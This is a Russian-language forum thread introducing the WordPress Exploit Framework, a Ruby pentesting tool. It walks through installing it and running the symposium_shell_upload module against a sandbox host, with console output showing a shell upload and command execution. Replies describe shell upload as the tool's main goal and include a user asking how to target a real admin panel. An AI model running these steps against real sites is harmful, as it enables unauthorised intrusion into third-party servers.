![]() |
Приветствую! Недавно в сети попался любопытный фреймворк для проведения тестирования на проникновение в отношении Wordpress. В этой публикации, я хочу вас с ним ознакомить.
Называется он Wordpress Exploit Framework. Написан инструмент на Ruby, включает в себя возможности для разработки собственных модулей и оказывает помощь в проведении пентеста Wordpress систем и сайтов. Давайте приступим к установке фреймворка: > git clonehttps://github.com/rastating/wordpress-exploit-framework > cd wordpress-exploit-framework/ https://forum.antichat.xyz/attachmen...3f8a17002a.png Для решения возникших в ходе установки проблем, советую посетить страницу разработчиков на github => https://github.com/rastating/wordpress-exploit-framework Запустим фреймворк: > ./wpxf.rb https://forum.antichat.xyz/attachmen...14e6b89e6d.png Загрузка модуля в фреймворке позволит вам установить параметры с набором команд и просматривать информацию о модуле, используя команды фреймворка. Ниже приведен пример того, как можно было бы загрузить symposium_shell_upload эксплойт-модуль, установить модуль и тип полезной нагрузки, затем выбрать необходимые параметры и запустить эксплойт против цели. > wpxf > use exploit/symposium_shell_upload [+] Loaded module: # > wpxf [exploit/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox > wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ > wpxf [exploit/symposium_shell_upload] > set payload exec [+] Loaded payload: # > wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" > wpxf [exploit/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully Команда: > help Покажет описание внутренних команд фреймворка: https://forum.antichat.xyz/attachmen...e2f74c0691.png Повторюсь, всю необходимую информацию о структуре фреймворка, решении возникших проблем и получении сведений о лицензии смотрим на странице разработчиков на github. Спасибо за внимание. |
Если верно понял, то данный фрейм стартует после получения данных тем же wpsan. Основная задача - заливка shell на уязвимую систему.
|
А перебирать уязвимости в данном фрейме возможно?
|
Цитата:
|
Цитата:
https://github.com/wpscanteam/wpscan Если не нравится wpscan, есть другие owasp-zap, w3af, nikto, skiphish, vega и т.д. Но wpscan не тратит много времени на поиск лишнего - он четко идет по заданному алгоритму, что помогает сократить время поиска уязвимости. [doublepost=1483298540,1483296652][/doublepost] Цитата:
|
Цитата:
[doublepost=1488537527,1488365807][/doublepost]подскажите что надо тут указать "set target_uri " |
[doublepost=1488537527,1488365807][/doublepost]подскажите что надо тут указать "set target_uri "[/quote]
Путь к Wordpress |
Цитата:
к админке? |
Set target_uri => /wordpress/ - к директории
|
Цитата:
вот админка, какую директорию нужно указать? |
| Время: 13:55 |